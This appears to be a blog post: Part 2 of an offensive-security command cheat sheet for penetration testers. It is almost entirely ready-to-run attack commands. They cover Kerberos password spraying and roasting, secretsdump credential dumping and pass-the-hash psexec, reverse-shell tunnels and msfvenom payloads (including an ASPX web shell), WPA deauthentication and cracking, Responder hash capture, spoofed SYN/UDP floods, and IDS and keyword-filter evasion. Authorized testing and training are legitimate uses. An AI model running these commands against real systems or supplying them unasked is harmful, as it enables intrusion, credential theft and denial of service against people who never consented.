June 10, 2026

Ultimate Offensive Security Command-Line Cheat Sheet (Part 2)

Disclaimer

Zemed

6 min read

Disclaimer

This article is for educational purposes and authorized ethical hacking/penetration testing only. Never run these commands against servers, networks, or applications you do not own or have explicit written permission to test. The author is not responsible for any misuse of the information provided.

Welcome to Part 2 of the Ultimate Offensive Security Command-Line Cheat Sheet. In Part 1, we covered foundational reconnaissance, port scanning, web fuzzing, password cracking, and initial access techniques.

In this installment, we shift focus toward the enterprise landscape: Active Directory (AD) enumeration, network pivoting, advanced Metasploit automation, wireless assessment, and system evasion. Bookmark this guide for your OSCP prep, active red-team engagements, or authorized security audits.

1. Active Directory (AD) & Kerberos Enumeration

Active Directory is the backbone of enterprise networks. Exploiting AD typically begins with thorough enumeration of users, groups, trust relationships, and delegation properties.

Passive AD Enumeration (via LDAP / Null Sessions)

Run anonymous queries against Active Directory if null sessions are allowed:

Generic Syntax:

ldapsearch -x -h <target_ip> -b "dc=<domain>,dc=<tld>" "(objectClass=user)" sAMAccountName

Example (Target DC: 10.y.y.y):

ldapsearch -x -h 10.y.y.y -b "dc=domain,dc=local" "(objectClass=user)" sAMAccountName

Kerbrute (User Enumeration & Password Spraying)

Enumerate valid domain usernames without triggering account lockouts by targeting Kerberos pre-authentication:

Generic Syntax:

kerbrute userenum --dc <target_ip> -d <domain_name> <user_list>

Example (Target DC: 10.y.y.y):

kerbrute userenum --dc 10.y.y.y -d domain.local user_list.txt

Password spray against known valid usernames:

Generic Syntax:

kerbrute passwordspray --dc <target_ip> -d <domain_name> <user_list> "<password>"

Example (Target DC: 10.y.y.y):

kerbrute passwordspray --dc 10.y.y.y -d domain.local user_list.txt "Password123!"

Impacket Suite (The AD Swiss Army Knife)

GetNPUsers (Request TGTs for users with DONT_REQ_PREAUTH enabled to perform ASREPRoasting):

Generic Syntax:

impacket-getNPUsers <domain_name>/ -usersfile <user_list> -format john -dc-ip <target_ip> -no-pass

Example (Target DC: 10.y.y.y):

impacket-getNPUsers domain.local/ -usersfile users.txt -format john -dc-ip 10.y.y.y -no-pass

GetUserSPNs (Request service tickets for Kerberoasting):

Generic Syntax:

impacket-getUserSPNs <domain_name>/<username>:<password> -dc-ip <target_ip> -request

Example (Target DC: 10.y.y.y):

impacket-getUserSPNs domain.local/domain_user:DomainPassword123 -dc-ip 10.y.y.y -request

SecretsDump (Dump SAM, LSA secrets, and NTDS.dit hashes from Domain Controllers):

Generic Syntax:

impacket-secretsdump <domain_name>/<username>:<password>@<target_ip>

Example (Target DC: 10.y.y.y):

impacket-secretsdump domain.local/administrator:AdminPassword123@10.y.y.y

PsExec (Execute a semi-interactive system shell using NT hashes):

Generic Syntax:

impacket-psexec <domain_name>/<username>@<target_ip> -hashes :<LM_hash>:<NT_hash>

Example (Target Host: 10.y.y.y):

impacket-psexec domain.local/administrator@10.y.y.y -hashes :aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

BloodHound (Ingesting AD Graph Data)

Collect comprehensive Active Directory pathing data using the Python collector:

Generic Syntax:

bloodhound-python -u <username> -p <password> -d <domain_name> -dc <dc_hostname> -c All

Example (Target DC Hostname: dc01.domain.local):

bloodhound-python -u domain_user -p DomainPassword123 -d domain.local -dc dc01.domain.local -c All

2. Pivoting, Tunneling & Port Forwarding

Once inside an internal network, you must route your traffic through compromised hosts to reach deeper, isolated segments.

Chisel (HTTP Tunneling / SOCKS5)

Set up a SOCKS5 tunnel over HTTP/HTTPS, which easily bypasses restrictive egress firewalls.

On Attacker Machine (Listener):

Generic Syntax:

chisel server -p <port> --reverse

Example (Attacker local Setup on Port 8000):

chisel server -p 8000 --reverse

On Compromised Pivot Machine (Client):

Generic Syntax:

chisel client <attacker_ip>:<port> R:socks

Example (Connecting back to Attacker local IP 10.x.x.x):

chisel client 10.x.x.x:8000 R:socks

(Now configure your local attacker system to route through SOCKS5 on 127.0.0.1:1080 via proxychains)

SSH Local and Remote Port Forwarding

Local Port Forwarding (Access a remote internal service at 10.z.z.z locally through a pivot host at 10.y.y.y):

Generic Syntax:

ssh -L <local_port>:<internal_target_ip>:<remote_port> <pivot_username>@<pivot_ip>

Example (Pivot Host: 10.y.y.y, Target Host: 10.z.z.z):

ssh -L 8080:10.z.z.z:80 pivotuser@10.y.y.y

Remote Port Forwarding (Make your attacker-controlled port accessible to the internal network via the pivot host at 10.y.y.y):

Generic Syntax:

ssh -R <remote_port>:<local_host_ip>:<local_port> <pivot_username>@<pivot_ip>

Example (Pivot Host: 10.y.y.y):

ssh -R 8080:127.0.0.1:4444 pivotuser@10.y.y.y

Dynamic Port Forwarding (Create SOCKS proxy via SSH through the pivot host at 10.y.y.y):

Generic Syntax:

ssh -D <local_socks_port> -N <pivot_username>@<pivot_ip>

Example (Pivot Host: 10.y.y.y):

ssh -D 9050 -N pivotuser@10.y.y.y

Forward internal Windows remote desktop (RDP) back to your local attacker machine (10.x.x.x):

Generic Syntax:

plink.exe -R <remote_port>:<local_host_ip>:<local_port> <attacker_username>@<attacker_ip> -N

Example:

plink.exe -R 3389:127.0.0.1:3389 attacker@10.x.x.x -N

3. Advanced Metasploit Framework (MSF) Usage

Automating payloads, generating custom executables with msfvenom, and setting up multi-stage handlers is vital for rapid execution.

MSFvenom Payload Generation

Windows x64 Staged Reverse TCP Executable:

Generic Syntax:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f exe -o <output_filename>

Example (Attacker IP: 10.x.x.x):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=4444 -f exe -o payload.exe

Linux x64 Stageless Reverse TCP ELF Binary:

Generic Syntax:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f elf -o <output_filename>

Example (Attacker IP: 10.x.x.x):

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f elf -o shell.elf

ASPX Reverse TCP Web Shell (For IIS Web Servers):

Generic Syntax:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f aspx -o <output_filename>

Example (Attacker IP: 10.x.x.x):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=4444 -f aspx -o shell.aspx

Automated Multi/Handler Setup

Spawn a quick backgrounded multi/handler listener targeting your local interface using a command-line one-liner:

Generic Syntax:

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD <payload_path>; set LHOST <attacker_ip>; set LPORT <port>; run -j"

Example (Attacker IP: 10.x.x.x):

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.x.x.x; set LPORT 4444; run -j"

Route & Portfwd inside Meterpreter

Once a Meterpreter session is established, pivot traffic through it.

Add Route to Internal Subnet:

Generic Syntax:

route add <subnet_range>/<subnet_mask> <session_id>

Example (Internal Target Subnet: 10.y.y.0/24):

route add 10.y.y.0/24 1

Port Forwarding (Access port 80 of an internal machine 10.y.y.y locally):

Generic Syntax:

portfwd add -l <local_port> -p <remote_port> -r <internal_target_ip>

Example:

portfwd add -l 8080 -p 80 -r 10.y.y.y

4. Wireless Network Exploitation

Auditing WiFi signals requires putting your interface into monitor mode and intercepting the WEP/WPA cryptographic handshakes.

Putting Interface into Monitor Mode

Check your wireless adapter interface name (usually wlan0):

Generic Syntax:

airmon-ng start <interface_name>

Example:

airmon-ng start wlan0

(This creates a virtual monitor interface, typically named wlan0mon)

Airodump-ng (Packet Sniffing)

Scan the surrounding airspace for active access points:

Generic Syntax:

airodump-ng <monitor_interface>

Example:

airodump-ng wlan0mon

Target a specific BSSID on a specific channel to capture raw frames (WPA 4-way handshake):

Generic Syntax:

airodump-ng -c <channel> --bssid <bssid_mac> -w <output_prefix> <monitor_interface>

Example (Target BSSID: 00:11:22:33:44:55):

airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture_file wlan0mon

Aireplay-ng (Packet Injection & Deauthentication)

Force a connected client to disconnect, capturing the 4-way handshake when they automatically reconnect:

Generic Syntax:

aireplay-ng --deauth <packet_count> -a <ap_bssid_mac> -c <client_mac> <monitor_interface>

Example (Client MAC: AA:BB:CC:DD:EE:FF):

aireplay-ng --deauth 10 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon

Aircrack-ng (Key Cracking)

Crack the captured WPA/WPA2-PSK handshake using a wordlist:

Generic Syntax:

aircrack-ng -w <wordlist_path> <capture_file>

Example:

aircrack-ng -w /usr/share/wordlists/rockyou.txt capture_file-01.cap

5. Network Sniffing & Man-in-the-Middle (MITM)

Capturing traffic on a local network segment allows you to harvest credentials, session cookies, and sensitive protocol details.

Tcpdump (Command-Line Sniffer)

Capture raw packets flowing through an interface and write them to a Wireshark-readable .pcap file:

Generic Syntax:

tcpdump -i <interface_name> -vv -w <output_filename>

Example (Interface: eth0):

tcpdump -i eth0 -vv -w traffic.pcap

Read specific traffic (e.g., only HTTP GET requests on interface eth0):

Generic/Example Configuration:

tcpdump -i eth0 -s 0 -A 'tcp port 80 and (tcp[((tcp[12:1]&0xf0)>>2):4] = 0x47455420)'

Macof (CAM Table Overflow)

Flood a local network switch with thousands of random MAC addresses, forcing it into "fail-open" hub mode to sniff all traffic:

Generic Syntax:

macof -i <interface_name> -n <packet_count>

Example (Interface: eth0):

macof -i eth0 -n 100000

Responder (LLMNR / NBT-NS Poisoning)

Passively capture NTLM hashes over the local network by answering broadcast name-resolution requests:

Generic Syntax:

responder -I <interface_name> -rPv

Example (Interface: eth0):

responder -I eth0 -rPv

6. Denial of Service (Stress Testing)

Validating network infrastructure resilience against resource exhaustion using hping3.

TCP SYN Flood (Stress Test)

Simulate a massive volumetric flow of spoofed connection requests to exhaustion:

Generic Syntax:

hping3 -S --flood --rand-source -p <port> <target_ip>

Example (Target: 10.y.y.y):

hping3 -S --flood --rand-source -p 80 10.y.y.y

UDP Stress Test (Fraggle Simulation)

Flood a target destination with massive UDP packets:

Generic Syntax:

hping3 --flood --rand-source --udp -p <port> <target_ip>

Example (Target: 10.y.y.y):

hping3 --flood --rand-source --udp -p 53 10.y.y.y

7. Anti-Virus (AV) & IDS Evasion

Bypassing signature-based security devices involves obfuscating, fragmenting, or translating command payloads.

Packet Fragmentation via Nmap

Force firewalls and Intrusion Detection Systems (IDS) to process tiny, fragmented IP packets, often causing signature mismatches:

Generic Syntax:

nmap -f --mtu <mtu_size> -sS <target_ip>

Example (Target: 10.y.y.y):

nmap -f --mtu 8 -sS 10.y.y.y

Decoy IP Address Cloaking

Hide your real scanning IP among several arbitrary decoy addresses:

Generic Syntax:

nmap -D <decoy_ip1>,<decoy_ip2>,ME,<decoy_ip3> -sS <target_ip>

Example (Attacker decoy IPs targeting 10.y.y.y):

nmap -D 10.a.a.a,10.b.b.b,ME,10.c.c.c -sS 10.y.y.y

Command Payload Obfuscation (Bash Evasion)

Bypass simple keyword detection filters (e.g., searching for the word whoami) by inserting empty string variables:

Local Executions:

w'h'o'a'm'i

Or by using standard shell variables:

w${u}h${x}o${y}a${z}m${i}i

8. IoT, Bluetooth & Mobile Assessment

Assessing custom micro-controllers, embedded devices, and short-range wireless channels.

Bluetooth Scanning & Discovery

Discover surrounding active Bluetooth devices:

Generic/Example Configuration:

hcitool scan

Enumerate the exact services running on a discovered Bluetooth MAC address:

Generic Syntax:

sdptool browse <bluetooth_mac_address>

Example (Target MAC: 00:11:22:33:FF:EE):

sdptool browse 00:11:22:33:FF:EE

Extracting Device Firmware via Binwalk

Scan a physical device firmware binary file for hidden filesystems, bootloaders, and private keys:

Generic Syntax:

binwalk -e <firmware_filename>

Example:

binwalk -e firmware.bin

Conclusion

That wraps up Part 2 of the Ultimate Offensive Security Command-Line Cheat Sheet! Armed with these commands, you can comfortably tackle network pivoting, Active Directory, and structured payload generation during your lab work or external exams.

๐Ÿ“š Coming up in Part 3:

  • Advanced Web Hacking & API Exploitation
  • Container Breakouts (Docker & Kubernetes Escapes)
  • Active Directory Kerberos Delegations & Trust Attacks

Did you find this reference guide useful? Please leave a ๐Ÿ‘ clap, save it to your bookmarks, and follow to stay updated on future releases!